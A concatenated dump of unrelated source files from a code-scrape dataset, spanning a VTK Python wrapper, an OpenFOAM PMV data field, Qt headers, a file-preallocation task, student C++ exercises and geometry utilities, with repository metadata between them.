(char*)"V.SetInput(vtkAbstractTransform)\nC++: void SetInput(vtkAbstractTransform *input)\n\nSet the input for this transformation. This will be used as the\nbase transformation if it is set. This method allows you to\nbuild a transform pipeline: if the input is modified, then this\ntransformation will automatically update accordingly. Note that\nthe InverseFlag, controlled via Inverse(), determines whether\nthis transformation will use the Input or the inverse of the\nInput.\n"},
{(char*)"GetInput", PyvtkGeneralTransform_GetInput, METH_VARARGS,
(char*)"V.GetInput() -> vtkAbstractTransform\nC++: vtkAbstractTransform *GetInput()\n\nSet the input for this transformation. This will be used as the\nbase transformation if it is set. This method allows you to\nbuild a transform pipeline: if the input is modified, then this\ntransformation will automatically update accordingly. Note that\nthe InverseFlag, controlled via Inverse(), determines whether\nthis transformation will use the Input or the inverse of the\nInput.\n"},
{(char*)"GetInverseFlag", PyvtkGeneralTransform_GetInverseFlag, METH_VARARGS,
(char*)"V.GetInverseFlag() -> int\nC++: int GetInverseFlag()\n\nGet the inverse flag of the transformation. This controls\nwhether it is the Input or the inverse of the Input that is used\nas the base transformation. The InverseFlag is flipped every\ntime Inverse() is called. The InverseFlag is off when a\ntransform is first created.\n"},
{(char*)"Push", PyvtkGeneralTransform_Push, METH_VARARGS,
(char*)"V.Push()\nC++: void Push()\n\nPushes the current transformation onto the transformation stack.\n"},
{(char*)"Pop", PyvtkGeneralTransform_Pop, METH_VARARGS,
(char*)"V.Pop()\nC++: void Pop()\n\nDeletes the transformation on the top of the stack and sets the\ntop to the next transformation on the stack.\n"},
{(char*)"InternalTransformPoint", PyvtkGeneralTransform_InternalTransformPoint, METH_VARARGS,
(char*)"V.InternalTransformPoint((float, float, float), [float, float,\n float])\nC++: void InternalTransformPoint(const double in[3],\n double out[3])\n\nThis will calculate the transformation without calling Update.\nMeant for use only within other VTK classes.\n"},
{(char*)"InternalTransformDerivative", PyvtkGeneralTransform_InternalTransformDerivative, METH_VARARGS,
(char*)"V.InternalTransformDerivative((float, float, float), [float,\n float, float], [[float, float, float], [float, float, float],\n [float, float, float]])\nC++: void InternalTransformDerivative(const double in[3],\n double out[3], double derivative[3][3])\n\nThis will calculate the transformation as well as its derivative\nwithout calling Update. Meant for use only within other VTK\nclasses.\n"},
{(char*)"CircuitCheck", PyvtkGeneralTransform_CircuitCheck, METH_VARARGS,
(char*)"V.CircuitCheck(vtkAbstractTransform) -> int\nC++: int CircuitCheck(vtkAbstractTransform *transform)\n\nCheck for self-reference. Will return true if concatenating with\nthe specified transform, setting it to be our inverse, or setting\nit to be our input will create a circular reference. CircuitCheck\nis automatically called by SetInput(), SetInverse(), and\nConcatenate(vtkXTransform *). Avoid using this function, it is\nexperimental.\n"},
{(char*)"MakeTransform", PyvtkGeneralTransform_MakeTransform, METH_VARARGS,
(char*)"V.MakeTransform() -> vtkAbstractTransform\nC++: vtkAbstractTransform *MakeTransform()\n\nMake another transform of the same type.\n"},
{(char*)"GetMTime", PyvtkGeneralTransform_GetMTime, METH_VARARGS,
(char*)"V.GetMTime() -> int\nC++: unsigned long GetMTime()\n\nOverride GetMTime to account for input and concatenation.\n"},
{NULL, NULL, 0, NULL}
};
static vtkObjectBase *PyvtkGeneralTransform_StaticNew()
{
return vtkGeneralTransform::New();
}
PyObject *PyVTKClass_vtkGeneralTransformNew(const char *modulename)
{
PyObject *cls = PyVTKClass_New(&PyvtkGeneralTransform_StaticNew,
PyvtkGeneralTransform_Methods,
"vtkGeneralTransform", modulename,
NULL, NULL,
PyvtkGeneralTransform_Doc(),
PyVTKClass_vtkAbstractTransformNew(modulename));
return cls;
}
const char **PyvtkGeneralTransform_Doc()
{
static const char *docstring[] = {
"vtkGeneralTransform - allows operations on any transforms\n\n",
"Superclass: vtkAbstractTransform\n\n",
"vtkGeneralTransform is like vtkTransform and vtkPerspectiveTransform,\nbut it will work with any vtkAbstractTransform as input. It is not\nas efficient as the other two, however, because arbitrary\ntransformations cannot be concatenated by matrix multiplication.\nTransform concatenation is simulated by passing each input point\nthrough each transform in turn.\n\nSee Also:\n\nvtkTransform vtkPerspectiveTra",
"nsform\n\n",
NULL
};
return docstring;
}
void PyVTKAddFile_vtkGeneralTransform(
PyObject *dict, const char *modulename)
{
PyObject *o;
o = PyVTKClass_vtkGeneralTransformNew(modulename);
if (o && PyDict_SetItemString(dict, (char *)"vtkGeneralTransform", o) != 0)
{
Py_DECREF(o);
}
}
|
f0b7b4cfcae78e5a02c69d8f7c20c40a3f6d9a2e
|
5ee0eb940cfad30f7a3b41762eb4abd9cd052f38
|
/Case_save/case5/1100/PMV
|
2b86e16350681a5e591ae00e4b001e589a934245
|
[] |
no_license
|
mamitsu2/aircond5_play4
|
052d2ff593661912b53379e74af1f7cee20bf24d
|
c5800df67e4eba5415c0e877bdeff06154d51ba6
|
refs/heads/master
| 2020-05-25T02:11:13.406899
| 2019-05-20T04:56:10
| 2019-05-20T04:56:10
| 187,570,146
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 9,454
|
PMV
|
/*--------------------------------*- C++ -*----------------------------------*========= |
\ / F ield | OpenFOAM: The Open Source CFD Toolbox
\ / O peration | Website: https://openfoam.org
\ / A nd | Version: 6
\/ M anipulation |
\*---------------------------------------------------------------------------*/
FoamFile
{
version 2.0;
format ascii;
class volScalarField;
location "1100";
object PMV;
}
// * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * //
dimensions [0 0 0 0 0 0 0];
internalField nonuniform List<scalar>
459
(
1.6624392496630822
1.4474501494407932
1.4225847953588528
1.4001887774601205
1.3844370171726552
1.374898741548855
1.3715948716344717
1.3739424807545155
1.3821678486027325
1.3968695331549021
1.4195009635226794
1.4506729619205583
1.4930598848555179
1.541873121498403
1.5464346658721793
1.6013522965997598
1.5894153598359368
1.5855953002051597
1.5865503259000024
1.5884603557302743
1.5903703567153737
1.591802838452764
1.5885821789703023
1.5879760640266993
1.5881641973954874
1.5893225078278121
1.5904317737980378
1.5920502319235832
1.5945326307546577
1.5993276241662455
1.6066041835120177
1.6085139044693382
1.6109010133031934
1.6214037270771728
1.6259736261248596
1.4686334933937943
1.4613724450362955
1.4409603679608511
1.4289581123834518
1.4214189137340358
1.418990640536249
1.4205942313548716
1.4249051135032067
1.4321702421971207
1.444482282320285
1.4648761178779601
1.4943679082693924
1.5302996275229719
1.5368812374097593
1.5349704740605614
1.5292380307014564
1.5579866182956437
1.582730180179957
1.5789099205040398
1.5803425311766675
1.5760655205843535
1.5716659141782476
1.569771291668986
1.5696094436809662
1.5698450234933297
1.5697453215499972
1.5694980502515947
1.5693214736203527
1.5692862530020448
1.569435794539418
1.5710048995988213
1.5777204153010735
1.5894153598359368
1.5932353038471139
1.5805401715243903
1.669104134250878
1.4712724985855048
1.496577927513154
1.487154559524523
1.4847608523508222
1.4842715902308066
1.485598631879107
1.4874403597752675
1.484759029599969
1.478883745831555
1.4750218301970557
1.477667138630262
1.491668023058278
1.516787528263328
1.5359258589453013
1.5368812374097593
1.536403548980931
1.4781519790825117
1.524079956144718
1.538571858376286
1.5472164878730592
1.5551154511109222
1.561038770689185
1.563574490418986
1.5695884335274108
1.5732835181320761
1.5743682201137312
1.574230133686775
1.5740653859873026
1.5729117993065398
1.570475293999126
1.5652795115777864
1.5665319877225914
1.5841580920471954
1.5724198316874074
1.5192945568398672
1.7460875192158452
1.4766628591493594
1.5238453458266232
1.5329000671431443
1.549983332874586
1.5650387034528894
1.5779073405986221
1.578612761709716
1.5589844214434554
1.5267329774890068
1.4957386976475804
1.476286813581786
1.473404935672742
1.4882824216933364
1.5167760450358487
1.5383142930378972
1.5349056728045025
1.4948796619697187
1.4877537856110743
1.5146518322276055
1.5390784688062924
1.5581031298973003
1.573154295253314
1.5836089864101608
1.586215321318148
1.5836500345002265
1.5822785398934232
1.581639552596798
1.581997404555986
1.583724333412935
1.5893935018324894
1.6001033445144297
1.6212194496004353
1.6137654814549536
1.599307385519391
1.552115932503536
1.4734409770045234
1.835702926789272
1.4968098011732869
1.5504274833216287
1.5772200046588196
1.6220097448455184
1.6722090344958016
1.7049129309527982
1.6764591130444593
1.6115675197331518
1.544770280121014
1.491353851041663
1.4585636646259188
1.4485808386928014
1.4584621434362686
1.4833762713815974
1.510993381627994
1.5230442442297938
1.5218309523200968
1.5280464434146992
1.5515653577029536
1.5797201680053883
1.6039767632416264
1.6214037270771728
1.629041477503538
1.6357240966005355
1.6414517450563357
1.6446348829725705
1.6432142725646
1.6405647591288544
1.6376554516885273
1.636235288032009
1.6361267621748947
1.637098075481024
1.6232056550809768
1.5970525700578762
1.5339246631193841
1.526631541521261
1.6533834089142463
1.6377419619729383
1.4732035664111516
1.9254458867838613
1.5397806420553268
1.6028544312803874
1.6286372940509393
1.6927359956641308
1.7216066964401615
1.7403712364215642
1.663439991169453
1.5901196470354666
1.5196911366924704
1.4627085599993204
1.4290729252545828
1.420794577030281
1.4356879423474123
1.467740206931301
1.5062729126917682
1.53925274628273
1.5632801819482154
1.5874066119092334
1.6094687536627543
1.624267941947258
1.6366787247038008
1.6467018343559572
1.6543378866080698
1.660541788859991
1.6657909677569525
1.6696083913320146
1.6724713692685045
1.6734256780639134
1.6719942116436883
1.6686540482255163
1.6634050090059667
1.655769587603263
1.6321523216113327
1.5982508887076825
1.5336053302415453
1.5322056136448092
1.5438200483162816
1.5408621547641745
1.5524134196415456
2.0143317876635956
1.6347711400999012
1.7537168121159685
1.724140816537634
1.719662084986036
1.7052042796346472
1.6624061402590282
1.5994447649780585
1.5257212703145748
1.4567085925656877
1.407256185394359
1.385893810195234
1.393506726090147
1.425484502902213
1.4754139762717058
1.5335462209196373
1.579387459163152
1.6018297501703664
1.6218811010694043
1.6385879569254937
1.6529061669643483
1.6638822049867343
1.6724713692685045
1.679151349233332
1.683922502202693
1.687739266172962
1.6906017460294627
1.6920329558616687
1.6915558881527026
1.6886934350223992
1.6834453967773129
1.6758114123044152
1.6672225175660698
1.655769587603263
1.6180226422777164
1.55807394715046
1.534821384111532
1.520842465429864
1.4942179672221227
1.5817690411464442
2.146678362583479
1.953071142851814
1.9090841138562145
1.8080435772110706
1.755999128462646
1.6882113492450046
1.5971542151898217
1.4983397489373371
1.4098415314959714
1.3489878099176091
1.323786494742998
1.3357788742170515
1.3793545720386582
1.4453856365852884
1.525908159473267
1.5789099205040398
1.610423595312227
1.636201411649902
1.655769587603263
1.67056272588582
1.68153695310354
1.6896475949802954
1.6963264642751483
1.7006197898349764
1.7039589156144264
1.7063439367289999
1.7072979290665065
1.7068209340505471
1.7053899351779271
1.702527875419404
1.6977575931903746
1.6901246716195797
1.6810598367027108
1.6710398899502528
1.660541788859991
1.6495654155828483
1.6260483637413234
1.6128771663322279
1.5517007190167467
1.4661635190310631
2.342745147102938
2.210123994286716
2.04236972956337
1.867762396619117
1.6979573366042167
1.5029020727890872
1.334885401621065
1.2198612132950892
1.1687217031593329
1.1767873610305288
1.2322039664002187
1.3224866254992602
1.431959935632431
1.5297157430507105
1.5789099205040398
1.624267941947258
1.6533834089142463
1.6734256780639134
1.687739266172962
1.6982346316371282
1.70586693710403
1.7109476965785806
1.7097713910465575
1.7084301050387674
1.7059524782563533
1.7027258110694492
1.6978983375564345
1.6912668015468442
1.6831174585016648
1.673562942011065
1.6629437905250397
1.6505131359873522
1.6392831117782996
1.6265827636867165
1.6120065256687874
1.5989560011297945
1.5891371233450065
1.5816015257432854
1.5686183609628772
1.540181110129267
-2.9578263524829054
-1.7042574748723411
-1.0700500750812132
-0.37880504747192734
0.14870225331874806
0.5654997312214779
0.905491890448114
1.1867293122944156
1.3499987260379176
1.4728573364443014
1.5559874369109914
1.6089913300081087
1.6456019511446156
1.6595005622913113
1.6706544236612764
1.6783462826241327
1.6834887141377388
1.6858214740073016
1.6866627757828572
1.6857457451304128
1.6844261168733032
1.6819888515720818
1.678691420047607
1.6743797866263685
1.669512814316446
1.6637404160904676
1.6583202231145726
1.6536587934894311
1.6496541857825529
1.6469790930212929
1.6449589915185834
1.6440463886521528
1.644151057465202
1.645460188202116
1.6537332686276256
1.6849504106412414
1.7969294620947214
1.638473246587415
-2.4349941835761535
-0.9766376290803391
0.035581080994615974
0.547531105389456
0.8758110278673674
1.0830850820465645
1.2362410799189965
1.3547999398681174
1.4466577439590314
1.5160566913542928
1.565390552250193
1.5990694838932422
1.6226759387121559
1.639621195695752
1.6511652284590534
1.6588226800971928
1.6635804438962034
1.6665837303653552
1.6686638019824676
1.669773950263085
1.6701414222607265
1.6702185338509792
1.6695060576959373
1.6684782509542815
1.667651909900217
1.666157174189428
1.6646915199494996
1.6641908259958202
1.6647049469684507
1.6676297179980395
1.6738947701547728
1.6848823283112058
1.697246271398696
1.7080386045975087
1.7221818890351364
1.783109259318521
1.6791523922846474
1.7683695058437394
-0.8949172423104498
-1.0343377935447637
-0.9127129032406857
0.3252050969394604
0.842626490334048
1.0637433693842124
1.2001851527905003
1.305840966494885
1.3911481442231106
1.4608920841288624
1.517704847281321
1.5616863933905087
1.594279475968353
1.616779276760617
1.6305320091956623
1.6387736804701634
1.6421639269326935
1.6431466122428795
1.643028022012679
1.641888160389996
1.6415656922187465
1.6409969753802305
1.6408990067950364
1.6412668130276145
1.6420923831722636
1.6433980982191483
1.6447730787633987
1.647432038451595
1.6512354921035048
1.6567143235333524
1.6641930996737264
1.675593230673874
1.6956989714160804
1.7307493537209908
1.761659676888525
1.766426708281122
1.7711934802598719
1.6932747327999753
1.69616293018844
1.5993344699981331
)
;
boundaryField
{
".*"
{
type zeroGradient;
}
}
// ************************************************************************* //
|
|
90e38deffa089d6cc51e0168adf399c4f641d4b3
|
c6259f4f2dcbb400daf554a72ce0452221b0b55f
|
/inventario.h
|
ecf312b3ede662d6115dcf65530afe32a57a3e73
|
[] |
no_license
|
kevinPinzon/Proyecto-Super_Mercado
|
761bfd4fb0e54e003b8f3a175336572ebe4ceb0e
|
7b35cc406dc426f93223486e7249d674678ee503
|
refs/heads/master
| 2020-12-25T16:49:41.680304
| 2015-03-26T18:46:41
| 2015-03-26T18:46:41
| 32,841,055
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 633
|
h
|
inventario.h
|
#ifndef INVENTARIO_H
#define INVENTARIO_H
#include "usuario.h"
#include "productos.h"
#include <vector>
#include <QDialog>
using std::vector;
namespace Ui {
class Inventario;
}
class Inventario : public QDialog
{
Q_OBJECT
public:
explicit Inventario(vector<Productos*>*,vector<usuario>* = 0,QWidget *parent = 0);
~Inventario();
private slots:
void on_pushButton_clicked();
void on_pushButton_2_clicked();
void on_pushButton_3_clicked();
void on_pushButton_4_clicked();
private:
Ui::Inventario *ui;
vector<Productos*>* productos;
vector<usuario>* usuarios;
};
#endif // INVENTARIO_H
|
d0a3db9f26566d51c5fb40d344a4aad8e1ec5fd3
|
51338769852ba8f28e57d0cde0c50a758fce1d4e
|
/DataHub-Vivado/DataHub-Vivado.sdk/DataHub/src/Messages.cpp
|
13cac1d9888d4bff95dbbd4c179aea48eb6bb9e7
|
[] |
no_license
|
brentru/568_WiFi
|
ebf81d9417d99d885ece04a12f1d8b50b63f993d
|
a576cb8c674fc3380334d290f780775c309452e0
|
refs/heads/master
| 2021-04-15T07:46:10.558308
| 2018-03-29T16:08:02
| 2018-03-29T16:08:02
| 126,885,082
| 1
| 0
| null | 2018-03-26T20:18:50
| 2018-03-26T20:18:43
| null |
UTF-8
|
C++
| false
| false
| 725
|
cpp
|
Messages.cpp
|
#include "Messages.h"
#include <string.h>
bool CreateConnReqMsg(Message* msg, uint8_t nodeId)
{
//msg = new Message();
msg->header.sourceId = nodeId;
msg->header.msgType = (uint8_t)CONNECTION_REQ;
return true;
}
bool CreateSysHealthMsg(Message* msg, uint8_t* payload, uint8_t nodeId)
{
//msg = new Message();
msg->header.sourceId = nodeId;
msg->header.msgType = (uint8_t)SYS_HEALTH;
memcpy(msg->payload, payload, PAYLOAD_SIZE);
return true;
}
bool CreateSensorRegMsg(Message* msg, uint8_t* payload, uint8_t nodeId)
{
msg = new Message();
msg->header.sourceId = nodeId;
msg->header.msgType = (uint8_t)SENSOR_REG;
memcpy(msg->payload, payload, PAYLOAD_SIZE);
return true;
}
|
a44507fbc42b1aa7a41bef10bc5ada5737a06ddb
|
b871d7cb6751064cfa0b73b7d1478029252d3ac3
|
/src/fs/allocationtask.cpp
|
714413b993db0b4195a506dabf4206982b92c662
|
[] |
no_license
|
nathan-osman/twistload
|
d64a7a4c8b64deaa542689a851cca90109bdd7b1
|
dc9f552f566f371322850cb781c53413250107a0
|
refs/heads/master
| 2021-01-18T09:51:12.616609
| 2017-07-21T19:02:24
| 2017-07-21T19:02:24
| 19,922,717
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,969
|
cpp
|
allocationtask.cpp
|
/*
* The MIT License (MIT)
*
* Copyright (c) 2017 Nathan Osman
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to
* deal in the Software without restriction, including without limitation the
* rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
* sell copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*/
#include <QFile>
#include <QMutexLocker>
#include "allocationtask.h"
const qint64 BlockSize = 65536;
AllocationTask::AllocationTask(const QString &filename, qint64 size)
: mFilename(filename),
mSize(size),
mAbort(false)
{
}
void AllocationTask::abort()
{
QMutexLocker locker(&mMutex);
Q_UNUSED(locker)
mAbort = true;
}
void AllocationTask::run()
{
// Open the file for writing (without truncating it)
QFile file(mFilename);
if (!file.open(QIODevice::WriteOnly | QIODevice::Append)) {
emit error(file.errorString());
emit finished();
return;
}
// Determine how much data remains to be written - and if the file is too
// large, truncate it
qint64 remaining = mSize - file.size();
if (remaining < 0) {
if (!file.resize(mFilename, mSize)) {
emit error(file.errorString());
emit finished();
return;
}
}
// Write blocks to the file until it reaches the desired size
const char block[BlockSize] = {};
while (remaining > 0) {
// Lock the mutex and check if the operation should be aborted
{
QMutexLocker locker(&mMutex);
Q_UNUSED(locker)
if (mAbort) {
break;
}
}
// Write another block to the file
qint64 bytesWritten = file.write(block, qMin(BlockSize, remaining));
if (bytesWritten == -1) {
emit error(file.errorString());
emit finished();
break;
}
remaining -= bytesWritten;
// Emit the progress signal
double p = 1.0 - static_cast<double>(remaining) / static_cast<double>(mSize);
emit progress(static_cast<int>(p * 100));
}
emit succeeded();
emit finished();
}
|
5842f2366ef8f3ddad0b6dcc811843f55f9a2c58
|
406d18198867dfec984a0e8fd64cd29f00e3f542
|
/11399_ATM.cpp
|
d1086a2e70ecc85a771c47c3e95c6a4e5e4cb4fd
|
[] |
no_license
|
CodingTestStudy/everyday_ps
|
8e09411fe46cdc5177b312404253efe3170c09ee
|
9115d567bb9b45f568ff79082dd67e1b2f01ae8e
|
refs/heads/master
| 2023-02-23T23:12:42.817775
| 2021-01-23T13:31:25
| 2021-01-23T13:31:25
| 323,349,217
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 322
|
cpp
|
11399_ATM.cpp
|
#include <iostream>
#include <algorithm>
#include <vector>
using namespace std;
vector<int>v;
int main() {
int a; cin >> a;
v.resize(a);
for (int i = 0; i < a; i++)cin >> v[i];
sort(v.begin(), v.end());
int sum = 0;
int ans = 0;
for (int i = 0; i < v.size(); i++) {
sum += v[i];
ans += sum;
}
cout << ans;
}
|
befd59f274d517ddf25b6dad640370b6399977e6
|
ecd09f15445be45e6278335de23ac7803d21e7e3
|
/sharpenyourself/effective_c++/clause6_be_aware_compiler_generated_function.cpp
|
bc9579d09c3a8b723f7f798f61a28a492bbe8ac7
|
[] |
no_license
|
zhu-liang/sharpen
|
0d1d928b39a8d16a5f32b8ad35010474d991f3ae
|
783eafe03452ba3ce6928e847bb1217e376997fe
|
refs/heads/master
| 2021-01-12T08:25:01.165056
| 2017-01-01T09:14:56
| 2017-01-01T09:14:56
| 76,571,458
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,816
|
cpp
|
clause6_be_aware_compiler_generated_function.cpp
|
/* This is to help understand effective C++ from
* Scott Meyers
* as named sharpen yourself
*/
/*
1. compiler will add silienty for us
with copy constructor
copy assignment
copy constructor
if they are used in the code, for example, shown as follows
*/
class Foo {
int iVal;
std::string strName;
};
void TestFun()
{
Foo A;
Foo B(A);
B = A;
}
/*
2. what if strName is not declared as string, instead, string& ?
Because chaning reference is not allow in C++,
Compiler will give up generate copy assignment and copy constructor for Foo then
*/
/*
3. in the case the string is used,
in the compiler generated copy assignment and copy constructor, string's copy assignment and copy constructor will be used, and for basic type, int, bit by
bit copy will be used
*/
/*
4. If we want Foo to be uncopyable, so we need to explicitly declare our own
copy constructor and copy assignment to prevent compiler from generating for us.
and we can declare these two functions as private. so it cannot be used.
shown as follows:
*/
class Foo {
int iVal;
std::string strName;
private:
Foo(const Foo&);
Foo& operator=(const Foo& );
};
/* or */
class uncopyable {
uncopyable() {}
~uncopyable() {}
private:
uncopyable(const uncopyable&);
uncopyable& operator=(const uncopyable&);
};
/* then Foo_new 如果我们有用到拷贝Foo_new, 则编译器生成的默认拷贝构造函数会去调用uncopyable的拷贝构造函数。会失败,这样也阻止了拷贝。
*/
class Foo_new private: uncopyable {
}
/*
5. In previous example, normally, when we write copy assignment and copy constructor, const Foo& can used to capture right value,
重要的事情 中文也来一遍,const引用类型可以搞定右值。
*/
|
507a342306d246834dfac60a609197ae8b4fc77c
|
bf1f45e565451d514e2ec698a2ae5eb835ebe056
|
/GameStart.h
|
8bb0aaf998563cfa3454e83a093dd1aac6ea8f7e
|
[] |
no_license
|
MrHause/sdl_snake
|
fa3a0225103a60cec12bc26fedc0051b36bbd86c
|
d2746ae0865173cf7b9ef6f1657bb5d04f915f59
|
refs/heads/master
| 2023-06-23T23:20:48.074576
| 2021-07-18T11:02:53
| 2021-07-18T11:02:53
| 371,417,155
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,099
|
h
|
GameStart.h
|
#pragma once
#pragma once
#include "SDL.h"
#include "GameStates.h"
#include "TextureMenager.h"
class GameStart : public GameStates {
private:
SDL_Texture* texture;
SDL_Rect srcRect, dstRect;
public:
GameStart(const char* path) {
texture = TextureMenager::loadTexture(path);
srcRect.x = 0;
srcRect.y = 0;
srcRect.w = 420;
srcRect.h = 210;
dstRect.w = srcRect.w;
dstRect.h = srcRect.h;
dstRect.x = 0;
dstRect.y = 120;
}
~GameStart() {
SDL_DestroyTexture(texture);
}
void update() override {
dstRect.x = 0;
dstRect.y = 120;
keyboardHandler();
}
void render() override {
if (texture) {
SDL_RenderClear(GameContext::gameRenderer);
TextureMenager::Draw(texture, srcRect, dstRect, 0.0f, SDL_FLIP_NONE);
SDL_RenderPresent(GameContext::gameRenderer);
}
}
void clear() override {
}
bool keyboardHandler() {
if (GameContext::event.type == SDL_KEYDOWN) {
switch (GameContext::event.key.keysym.sym) {
case SDLK_SPACE:
this->context_->TransitionTo(new Game);
return true;
break;
default:
break;
}
}
return false;
}
};
|
360dc9d01d9fc9f23a6247d1ceeb018bbd8d3c35
|
b7fb0d2648b49af647f583d06ad492745a1ecbde
|
/src/graph_io/src/readPythonGraphFile.h
|
0a183ca36dcdb7216919de9ac9f1907a51be5f12
|
[] |
no_license
|
oscar-raig/rebuild-graph
|
d262e1eb0b30fbfba8aed7302e37be3730d20e06
|
38cbe0766a308ae73e6411b3f026855172fed464
|
refs/heads/master
| 2021-01-22T23:26:21.936952
| 2015-10-09T21:51:12
| 2015-10-09T21:51:12
| 42,291,951
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 526
|
h
|
readPythonGraphFile.h
|
//
// readPythonGraphFile.h
// rebuild_graph
//
// Created by Oscar Raig Colon on 20/7/15.
// Copyright (c) 2015 Oscar Raig Colon. All rights reserved.
//
#ifndef __rebuild_graph__readPythonGraphFile__
#define __rebuild_graph__readPythonGraphFile__
#include <stdio.h>
#include "gslGraph.hpp"
#ifndef STRING_LENGTH
#define STRING_LENGTH 256
#endif
class ReadPythonGraphFile {
public:
static gslGraph *readPythonGraphFile(std::string fileName);
};
#endif /* defined(__rebuild_graph__readPythonGraphFile__) */
|
7ae13af7cb052de19c463d9e34c3b777df1acbf2
|
5ce3aff51c41a54b1456b4eea9551c5238365eba
|
/RRT_star/src/splined-RRT-star2/Line_Angle.cpp
|
3090608daeddcc8612784b80549d031b3b99f0bc
|
[] |
no_license
|
baihongzeng/F1_10_car
|
cf9c5cc94cb6e527a7db48cb63c7e0bdd8393d5e
|
1a2bc1a471aef29454c9d57515c0e4947274c4f1
|
refs/heads/master
| 2020-08-01T07:25:31.877455
| 2019-12-02T01:57:40
| 2019-12-02T01:57:40
| 210,911,824
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,422
|
cpp
|
Line_Angle.cpp
|
#include <tuple>
#include "NodeClass.h"
#include <array>
#include "constants.h"
#include "Line_Angle.h"
//Purpose: get gradient k and interceptor b of the line between p1 and p2
//input: line starts from p1 to p2
//output : k : gradient of the line; b : intercept of the line
get_k_b_output Get_k_b(COORD p1, COORD p2)
{
get_k_b_output k_and_b;
k_and_b.k = (p2[1] - p1[1]) / (p2[0] - p1[0]);
k_and_b.b = p1[1] - p1[0] * k_and_b.k;
//std::tuple<double, double> k_and_b = std::make_tuple(k, b);
return k_and_b;
}
//purpose: get the dot product of two unit vector u1 and u2
double dot_product(std::array<double, 2> & u1, std::array<double, 2> & u2)
{
return u1[0] * u2[0] + u1[1] * u2[1];
}
//purpose:get the L2norm of a vector
double norm2d(std::array<double, 2> & u1)
{
return sqrt(pow(u1[0], 2) + pow(u1[1], 2));
}
//purpose: get the cross product of two vectors
double cross_product(std::array<double, 2> & u1, std::array<double, 2> & u2)
{
return u1[0] * u2[1] - u1[1] * u2[0];
}
//purpose:get the angle between two vectors
double Angle_Between_2dVector(std::array<double, 2> & u1, std::array<double, 2> & u2)
{
double dot = dot_product(u1, u2);
double norm1 = norm2d(u1);
double norm2 = norm2d(u2);
double mod_multiplication = norm1 * norm2;
double no_orient_angle_rad = acos(dot / mod_multiplication);
double cross = cross_product(u1, u2);
if (cross < 0)
{
no_orient_angle_rad = -no_orient_angle_rad;
}
double orient_angle_rad = no_orient_angle_rad;
double orient_angle_deg = orient_angle_rad * 180 / pi;
return orient_angle_deg;
}
//purpose:get the distance between two points (point1, point2)
double dist(std::array<double, 2> point1, std::array<double, 2> point2)
{
return sqrt(pow(point1[0] - point2[0], 2) + pow(point1[1] - point2[1], 2));
}
//purpose: change input angle range from [-180, 180] to [0, 360]
double change_angle_range(double angle)
{
if (-180 < angle && angle < 0)
{
angle = angle + 360;
}
return angle;
}
//purpose:obtain unit vector goes from p1 to p2
std::array<double, 2> GetVector(COORD p1, COORD p2)
{
std::array<double, 2> unit_vec;
unit_vec[0] = (p2[0] - p1[0]) / sqrt(pow((p1[0] - p2[0]), 2) + pow((p1[1] - p2[1]), 2));// unit vector from qnear to qrand
unit_vec[1] = (p2[1] - p1[1]) / sqrt(pow((p1[0] - p2[0]), 2) + pow((p1[1] - p2[1]), 2));
return unit_vec;
}
|
970ed775e933c3ad34059c2be59fbc0ffc46b552
|
a47717514cc9f5e7d76b9bfd1d38d11775249ae6
|
/Atividades/Renan Henrique/Revisão/Lista 4/Exercicio 2/src/Filmes.cpp
|
fc8091bcdd9b243192a56452175003bb1784c64c
|
[] |
no_license
|
professorlineu/PRCE2-2019-2
|
ccfbb43654069e5db529bca5bb8038212f44e9b6
|
3c20eef4af268e7d8b1527a5351722a4e1ccc45d
|
refs/heads/master
| 2020-06-26T03:13:13.294654
| 2019-12-10T01:14:33
| 2019-12-10T01:14:33
| 199,508,327
| 7
| 3
| null | 2019-09-12T00:30:35
| 2019-07-29T18:41:42
|
C++
|
ISO-8859-1
|
C++
| false
| false
| 929
|
cpp
|
Filmes.cpp
|
#include "Filmes.h"
Filmes::Filmes()
{
//ctor
ID = 0;
Ano = 0;
sNome = "-";
}
Filmes::~Filmes()
{
//dtor
}
void Filmes::setNome()
{
string x;
cout << "Inserir nome do filme: ";
getline (cin, x);
sNome = x;
}
void Filmes::setID()
{
int y;
cout << "Inserir ID: ";
cin >> y;
ID = y;
}
void Filmes::setAno()
{
int z;
bool cont = true;
cout << "Inserir ano de lançamento: ";
while (cont) {
cin >> z;
if (z > 2019) {
cout << "Data inválida! Favor inserir novamente: " << endl;
}
else
{
cont = false;
}
}
Ano = z;
}
int Filmes::getID()
{
cout << endl << "ID: " << ID;
}
int Filmes::getAno()
{
cout << endl << "Ano de lançamento: " << Ano;
}
string Filmes::getNome()
{
cout << endl << "Nome do filme: " << sNome;
}
|
07084fbbc934032f97c532daec01cc6d18524bad
|
998ab7c44e7ac838aed0978d12952224767375e5
|
/Programming in C and C++/a7/two.h
|
9d21c34b325b978a1b5e8451e25726300bc120d2
|
[] |
no_license
|
SubigyaPaudel/Jacobs_Coursework
|
ac04c40b79dccea0a0e6803726a0540fe0f355d1
|
1f0af156774a24a80310572d65851f284b0e9d86
|
refs/heads/main
